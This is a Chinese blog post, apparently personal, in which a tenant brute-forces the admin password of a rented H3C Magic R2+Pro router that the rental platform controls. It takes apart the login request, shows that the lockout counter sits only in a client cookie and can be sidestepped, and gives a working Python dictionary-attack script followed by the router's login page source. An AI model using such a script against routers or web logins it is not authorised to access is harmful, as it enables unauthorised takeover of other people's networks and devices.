暴力破解路由器管理密碼

搬新家以後,第一時間連上網絡,登錄路由器後臺。 博主租的房子是某平臺的,網絡是由平臺提供的。和上次租房不同的地方在於,這次路由器後臺管理密碼居然和給的wifi連接密碼不一樣了,肯定是有人改過密碼了!admin 等弱口令都試過了,全都不管用!對一個it技術人員來說,被人掌握網絡生殺大權肯定是無法容忍的!

第一次測試的時候嘗試用telnet登錄路由器,發現密碼已經被更改,無法登錄,預料是跟web控制檯密碼一起改變的。

沒有辦法只能去研究web登錄界面。

要暴力破解的話,我們需要用代碼去構造http請求,因此我們要具備以下條件:

1.登錄請求的地址是多少

2.請求格式是怎麼樣的

3.登錄成功以後改如何判斷

4.有沒有對暴力破解做黑名單限制(有的話我們需要更改mac地址)

5.暴力破解的字典

 

話不多說趕緊去嘗試

於是博主去嘗試下登錄失敗以後,有密碼錯誤的提示:

network如下,很明顯的同步提交 。瞭解http的都知道同步表當提交表單data放在body裏,以 [參數名]=[值]的形數存放到

這裏我們構造請求的請求地址,參數都有了。 

然後我們去判斷一下怎麼會彈出錯誤提示的:

因爲是同步提交,其實本質上是對頁面的跳轉,很明顯html內容就在response裏面,

ctrl+f 一把找到了密碼錯誤的JS ,可以看到 checkPsdFlag是關鍵checkPsdFlag='flase'。

彈出來的密碼錯誤,在往上面看'true'==checkPsdFlag 是登錄成功。

神奇的地方在於checkPsdFlag是resultInfo字符串截取出來的 。

那豈不是這個頁面永遠都是登錄失敗?  沒錯!

記得上面所說的麼,這個是同步請求 。因此我懷疑 resultInfo是後臺代碼渲染出來的,

失敗的時候是var resultInfo="false;0"; 成功的時候是var resultInfo="true;0";

證據在下面:當三次登錄失敗以後,再刷新這個頁面:

所以登錄成功的條件就是 返回的html裏面存在 var resultInfo="true;0";

據我研究這個頁面沒有記錄登錄測試,連登錄次數都是記錄在cookie裏的,算是比較幼稚的代碼(。≖ˇェˇ≖。)

所以就犯不着修改物理地址去欺騙路由器了。直接暴力破解。

於是寫了一段python代碼[比較隨意寫的,只爲了破解,就沒特意封裝  ( ᖛ ̫ ᖛ )ʃ)]

字典比較大,所以遍歷文件的時候有個跳過多少行參數[這樣今天破解不完 下次直接跳過上次已經讀過的行繼續往下破解就好了]

# -*- coding: utf-8 -*-

import requests
from itertools import islice
import sys
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
    'Cookie':'LOGINCOUNT=1; LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true'
}

def post(passwd):
    data="psd="+passwd
    res = requests.post(url="http://192.168.124.1/router_password_mobile.asp"
                    ,data=data,headers=headers)
    if('var resultInfo="true;0";' in res.text):
        return True
    else:
        return False
  
def record(content):
    with open("E:/work/36.4GB-18_in_1.lst/passwd.txt", 'w') as file:
        file.write(content)
    
def readDic(skip):
    linenum = skip - 1
    with open("E:/work/36.4GB-18_in_1.lst/18_in_1.lst", 'r') as file:
         for line in islice(file,skip,None):
            linenum = linenum+1
            line=line.replace('\n',"")
            res=post(line)
            print(str(linenum)+" "+line+" "+str(res), end="|")
            if(res):
                print("FOUND!")
                record("FOUND! "+str(linenum)+" "+line+" "+str(res))
                break
            if(linenum%1000 == 0):
                record(str(linenum)+" "+line+" "+str(res))
if __name__ == "__main__":
           
    readDic(0)             

其中record會每1000行記錄下行號,在破譯成功的時候記錄正確的密碼。字典的話需要網上自己去下載

然後就可以開始破解了:

記錄着 行號 密碼 結果

最後貼下路由器返回頁面的源碼ฅ•ﻌ•ฅ

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<HTML><HEAD>
<meta http-equiv="X-UA-Compatible" content="IE=EDGE">
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META HTTP-EQUIV=Pragma CONTENT=no-cache>
<meta name="viewport" content="user-scalable=0" />
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0" />
<title>H3C&nbsp;Magic R2+Pro千兆版&nbsp設備登錄</TITLE>
<LINK Rel="SHORTCUT ICON" href="favicon.ico" type="image/x-icon">
<LINK href=er_globe.css type=text/css rel=stylesheet>
<SCRIPT src=icg_helpScript.js></SCRIPT>
<SCRIPT language=JavaScript src=icg_utils.js></SCRIPT>
<SCRIPT src=utils.js></SCRIPT>
<script src=globalFunctions.js type=text/javascript></script>
<script src=main.js type=text/javascript></script>
<SCRIPT src=Scg_cookie.js></SCRIPT>

<SCRIPT language=JavaScript>


var sys_version = "R2+ProGV100R006L01";
var Product_Type = "R2+ProG";
var mac_addr = "78:2C:29:DF:91:86";
var lan_local_info='192.168.124.1;255.255.255.0;0;78:2C:29:DF:91:86';

var PRODUCT_FORUM_URL = "http://bbs.h3c.com";
var PRODUCT_APPLICATION_URL = "http://magic.h3c.com/rest/magic/getApp";
var bPwdIsSyncByAc = 0;
var DefaultLoginflag = 0;
var admin_same_flag = 0;
var IsSupportPcWebOnly = 0;

var tt = lan_local_info.split(";");
var ip_addr = tt[0];
var telnumber = "400 600 6363";
var user_level = 1;

/*獲取系統類型(PC or Mobile)*/
var isMobileSyetem = checkMobile();
var isAppleSystem = checkAndroidOrApp();

function wifi_init()
{
    /*Begin: Added by y09312 of 2015-03-03*/
    /*如果路由器登錄頁面只是一個子頁面,則將其主頁面切換爲當前登錄頁面。*/
    var parentPage = top.window.location.toString().replace(/.*\//,'');
    parentPage=parentPage.replace(/\?.*/,'');

    if(parentPage != cPage)
    {
        top.window.location = cPage;
    }
    /*End: Added by y09312 of 2015-03-03*/
    
    document.getElementById("psd").value = "";
    document.router_password_set.psd.focus();
}

function onBodyLoad()
{
    /*刷新登錄頁面或者提交失敗時,清除cookie。*/
    deleteCookie("USERLOGINIDFLAG");
    deleteCookie("MAIN_FLAG");
    deleteCookie("MOBILE_FLAG");
	
    wifi_init();
    
    var flag = getCookie("PSWMOBILEFLAG");
    if("true" == flag)
    {
        var resultInfo="false;0";
        var resultArray = resultInfo.split(";");
        var checkPsdFlag = resultArray[0];
        var sessionid = resultArray[1];
        
        if ("true" == checkPsdFlag)
	    {
            /*只有密碼驗證成功之後,才更新cookie。*/
            addCookie("USERLOGINIDFLAG", sessionid);
            deleteCookie("LOGINCOUNT");

			if (1 == IsSupportPcWebOnly)
			{
				GURL("home.asp");
			}
			else
			{
				GURL("mobile.asp");
			}
		    
            return;
	    }
	    else if("false" == checkPsdFlag)
	    {	    			  
		    /*Begin Modified by y09312 2016-06-16, IDMS: 201606300144, of 解決Web登錄用戶超過限制時Webs進程掛死問題*/
            if(1 == sessionid)
            {
                mobile_display_message("warningmsg", "訪問用戶個數超過最大限制。");
            }
            else
            {
            	var wrong_logincount = getCookie("LOGINCOUNT");

				if ("3" == wrong_logincount)
				{
					deleteCookie("LOGINCOUNT");
					GURL("wrong_login.asp");
				}
				else
				{
	                mobile_display_message("warningmsg", "密碼錯誤,請重試。");

                    /*首次打開瀏覽器時,cookie值爲空; 在IE中,空爲undefined;在firefox中,空可直接判斷;其餘主流瀏覽器都在這兩種情況內。*/
					if (("" == wrong_logincount) || ("undefined" == typeof(wrong_logincount)))
					{
						addCookie("LOGINCOUNT", "1");
					}
					else if ("1" == wrong_logincount)
					{
						addCookie("LOGINCOUNT", "2");
					}
					else if ("2" == wrong_logincount)
					{
						addCookie("LOGINCOUNT", "3");
					}
				}									
            }
	        /*End Modified by y09312 2016-06-16, IDMS: 201606300144, of 解決Web登錄用戶超過限制時Webs進程掛死問題*/
            document.getElementById("psd").select();
	    }
    }

    /*根據屏幕分辨率,動態調整頁面寬度和高度。*/
    var screen_width = screen.availWidth;
    var screen_height = screen.availHeight;

    document.getElementById("formbackground").style.width = screen_width;
    document.getElementById("formbackground").style.height = screen_height;
    
    deleteCookie("PSWMOBILEFLAG");
    deleteCookie("LOGIN_PSD_REM_FLAG");

    return;
}

function mySubmit()
{
	var sUserPass = document.getElementById("psd").value;

    document.getElementById("warningmsg").innerHTML="";
	document.getElementById("warningmsg").height = 1;
    
	if (0 == sUserPass.length)
	{
        mobile_display_message("warningmsg", "請輸入密碼。");
		
	    document.getElementById("psd").focus();
	    return false;
	}

    if(document.getElementById("psd_en").checked == true)
    {
        addCookie("LOGIN_PSD_REM_FLAG", 1);
    }
    else
    {
        addCookie("LOGIN_PSD_REM_FLAG", 0);
    }
    
    addCookie("PSWMOBILEFLAG", "true");
	
    document.router_password_set.submit();
	return true;
}

function GURL(page)
{
	window.location = page;
}

function link(item)
{
    document.getElementById(item).href = PRODUCT_APPLICATION_URL; 
    document.getElementById(item).target = "_blank";
}

function mouseOn(item)
{
	document.getElementById(item).style.textDecoration= 'underline';
}

function mouseOut(item)
{
    document.getElementById(item).style.textDecoration= 'none';
}

function accept_it()
{
    deleteCookie("LOGINCOUNT");
	GURL("wrong_login.asp");
}

</SCRIPT>
</HEAD>
<body bgcolor=#ffffff leftMargin=0 topMargin=0 MARGINWIDTH=0 MARGINHEIGHT=0 BORDER=0 onload=onBodyLoad()>

<div id="formbackground" name="formbackground" style="position:absolute; z-index:-1;">
  <SCRIPT language=JavaScript>
      if(true == isMobileSyetem)
      {
          document.write('<img id="bodyimg" name="bodyimg" src="bg_mobile2.jpg" height="100%" width="100%">');
      }
      else
      {
          document.write('<img id="bodyimg" name="bodyimg" src="bg_pc2.jpg" height="100%" width="100%">');
      }
	  
  </SCRIPT>
</div>

<table id="firstTable" border=0 width="100%" height=60 style="background-color:#4670a9;">
<TR> 
    <TD width=5%></TD>
    <TD width=25%>
        <div align=left><IMG id="go" name="go" src="h3c_logo.png" class=mobileH3cImg onclick="goto_H3C()"></div></TD>
    <TD width=40%></TD>
    <TD width=25%></TD>
    <TD width=5%></TD>
</TR>
</table>

<FORM action="" method="POST" name=router_password_set>
<TABLE cellSpacing=0 cellPadding=3 border=0 width=100%>
  <TBODY>
    <TR>
      <TD align=center height=20 colspan=3></TD>
    </TR>
    
    <TR>
      <TD width=10%></TD>
      <TD width=80% align=left height=40><span style="width:100%; height:30; text-align:left; color:#1e5094; font-family:Microsoft YaHei; font-size:16px;">管理密碼</span></TD>
      <TD width=10%></TD>
    </TR>

    <TR>
      <TD align=center height=40 colspan=3>
        <INPUT type=password id="psd" name="psd" maxlength="63" style="width:80%;" class=mobileText onkeypress="onEnterSub_Firefox(event,mySubmit,user_level)" onpaste="return false;">
        <input type=text style="display:none;">
      </TD>
    </TR>

    <TR>
      <TD WIDTH=10%></TD>
      <TD WIDTH=80% align=left>
        <INPUT id="psd_en" name="psd_en" type=checkbox>
        <span style="height:30; text-align:left; color:#1e5094; font-family:Microsoft YaHei; font-size:13px;">記住密碼</span>
        <span>&nbsp</span>
		<span style="height:30; text-align:left; color:#33bcef; font-family:Microsoft YaHei; font-size:13px; cursor:pointer; text-decoration:underline;" onclick="accept_it();" >忘記密碼?</span>
        </TD>
       <TD WIDTH=10%></TD>
    </TR>
        
    <SCRIPT language=JavaScript>
      if(1 == bPwdIsSyncByAc)
      {
          document.write('<TR class=textCell>');
          document.write('<TD colspan=1 width="10%" align=left></TD>');
          document.write('<TD colspan=1 width="80%" id="pass_message" name="pass_message" class=mobileNoticeTxt>')
          mobile_display_message_shuoming("pass_message", "當前管理密碼與管理器的密碼一致。");
          document.write('</TD>');
          document.write('<TD WIDTH=10%></TD>');
          document.write('</TR>');
      }
      else if(1 == DefaultLoginflag)
      {
          document.write('<TR class=textCell>');
          document.write('<TD colspan=1 width="10%" align=left></TD>');
          document.write('<TD colspan=1 width="80%" id="pass_message" name="pass_message" class=mobileNoticeTxt>')
          mobile_display_message_shuoming("pass_message", "當前爲默認密碼【admin】。");
          document.write('</TD>');
          document.write('<TD WIDTH=10%></TD>');
          document.write('</TR>');
        
      }
      else if(1 == admin_same_flag)
      {
          document.write('<TR class=textCell>');
          document.write('<TD colspan=1 width="10%" align=left></TD>');
          document.write('<TD colspan=1 width="80%" id="pass_message" name="pass_message" class=mobileNoticeTxt>')
          mobile_display_message_shuoming("pass_message", "當前管理密碼與Wi-Fi密碼一致。");
          document.write('</TD>');
          document.write('<TD WIDTH=10%></TD>');
          document.write('</TR>');
      }
    </SCRIPT>    
    <TR>
      <TD WIDTH=10%></TD>
      <TD WIDTH=80% align=left class=mobileWarnningTxt id="warningmsg" name="warningmsg"></TD>
      <TD WIDTH=10%></TD>
    </TR>

    <TR><TD align=center height=10 colspan=3></TD></TR>
    <TR><TD align=center height=40 colspan=3>
        <input name="login" id="login" type=button style="WIDTH:80%; HEIGHT:45px;" class=mobileButton value="登錄" onclick="mySubmit();">
    </TD></TR>

    <TR><TD align=center colspan=3>
      <SCRIPT language=JavaScript>
      /*以下產品支持APP: B1、B1ST、F1、R2+、R2+pro*/
      /*以下產品不支持APP: B0、B3、R100*/
      /*在PC端需顯示APP和微信的二維碼圖片,在移動端只需顯示APP的鏈接*/
      if (("B3" != Product_Type) && ("B0" != Product_Type) && ("R100" != Product_Type))
      {
	      /* Begin modify by w12167, 2016-1-4, IDMS:201601040185 */
	      if(true == isMobileSyetem)
	      {
              if("" != PRODUCT_APPLICATION_URL)
              {
    	          document.write('<TR><TD height=100 align=center colspan=3 style="FONT-SIZE:16px; FONT-WEIGHT:bold; color:#1c4e92; FONT-FAMILY: "Microsoft YaHei" ! important;">');
    	          document.write('<a id="APP_URL" name="APP_URL" style="text-decoration:underline;cursor:pointer; FONT-SIZE:16px; FONT-WEIGHT:bold; color:#1c4e92; FONT-FAMILY: "Microsoft YaHei" ! important;" onclick="link(\'APP_URL\');">點擊下載華三魔術家APP</a>');
    	          document.write('</TD></TR>');
              }
	      }
	      /* End modify by w12167, 2015-1-4, IDMS:201601040185 */
	      else
	      {
	          /* Begin modify by w12167,2-15-12-10.IDMS:201511250468 */
	          /* Begin modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 */
	          //如果是PC,則推送二維碼。
	          document.write('<TR><TD colspan=3>&nbsp;</TD></TR>');
	          document.write('<TR><TD align=center colspan=3>');
			  if ("A210-G" != Product_Type)
			  {
		          document.write('<a><img src="magic_app.jpg" border="0" style="height:236px; width:200px;"></a>');
				  document.write('<label>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</label>');
			  }
	          document.write('<a><img src="weixin.jpg" border="0" style="height:236px; width:200px;"></a>');
	          document.write('</TD></TR>');
			  /* End modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 */
	          /* End modify by w12167,2-15-12-10.IDMS:201511250468 */
	      }
      }
	  else
	  {
		  /* Begin modify by w12167, 2016-1-4, IDMS:201601040185 */
	      if(true == isMobileSyetem)
	      {
	      	  ;
	      }
	      /* End modify by w12167, 2015-1-4, IDMS:201601040185 */
	      else
	      {
	          /* Begin modify by w12167, 2015-12-11, IDMS:201511250468 */
	      	  /* Begin modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 */
	          //如果是PC,則推送二維碼。
	          document.write('<TR><TD colspan=3>&nbsp;</TD></TR>');
	          document.write('<TR><TD align=center colspan=3>');
	          document.write('<a><img src="weixin.jpg" border="0" style="height:236px; width:200px;"></a>');
	          document.write('</TD></TR>');
			  /* End modify by jiangjiguang 11967, 2015-8-19, IDMS 201508190089 */
	          /* End modify by w12167, 2015-12-11, IDMS:201511250468 */
	      }
	  }
      </SCRIPT>
    </TD></TR>
  </TBODY>
</TABLE>
</FORM>
</BODY>
</HTML>


 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章